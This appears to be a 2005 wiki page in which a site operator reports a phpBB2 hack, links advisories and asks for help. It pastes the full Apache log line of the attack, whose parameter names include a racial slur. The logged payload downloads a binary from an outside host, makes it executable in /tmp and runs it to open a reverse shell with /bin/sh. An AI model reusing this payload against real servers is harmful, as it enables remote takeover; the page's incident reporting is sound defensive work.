You can edit this page using the password "please".

Warning

This page is super-wide because it includes a line of code that makes the window stretch out.

Scroll right to see the title!

PHPBB2 code injection exploit

I know that a few people who run PmWiki also run PHPBB2 bulletin boards.

One of mine was hacked with an SQL code injection attack. I am not sure what the results of this hack are, but in one report, the author claims it can be used to add an SQL user with administrative rights:

	http://www.waraxe.us/ftopict-426.html

If anyone has further info on this exploit, I would like to hear it via private mail or by adding your comments to this page.

Unfortunately, in the rush to mitigate the damage I ended up having my server IP switched, so DNSes may be behind. (It's a long story you don't want to hear, believe me!)

Apparently it is only version 2.0.11 or lower that is vulnerable, but when I went to PHPBB2 to get an update, I found their site database was throwing errors!!


Looks like the code is posted here: http://www.securityfocus.com/archive/1/393202/2005-03-12/2005-03-18/0


This is the Apache log entry where the injection occured on my system:


start===

mugoo.eton.ca 82.50.180.171 - - [16/Mar/2005:14:03:08 -0500] "GET /phpbb2/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=589e2909e59ae314598ec36f73fc141d&niggaip=www2.100mb4free.de&niggaport=10001&nigga=$a=fopen(\"http://img58.exs.cx/img58/1584/nc4hk.swf\",\"r\");$b=\"\";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);$a=fopen(\"/tmp/.sess_\",\"w\");fwrite($a,$b);fclose($a);chmod(\"/tmp/.sess_\",0777);system(\"/tmp/.sess_%20\".$_REQUEST[niggaip].\"%20\".$_REQUEST[niggaport].\"%20-e%20/bin/sh\"); HTTP/1.1" 200 114 "http://mugoo.eton.ca/phpbb2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


end====

Can anyone tell me what this does???


More info here: http://www.k-otik.com/english/advisories/2005/0212

...where they say: Two vulnerabilities were reported in phpBB, which may be exploited by attackers to determine the installation path or bypass certain security features. The first problem resides in the "autologinid" (includes/sessions.php) variable and could be exploited by malicious users to gain administrator rights. The second flaw resides in the "viewtopic.php" script, and could be exploited to disclose the webroot path.


Page last modified by NeilHerber, April 26, 2005, at 03:14 PM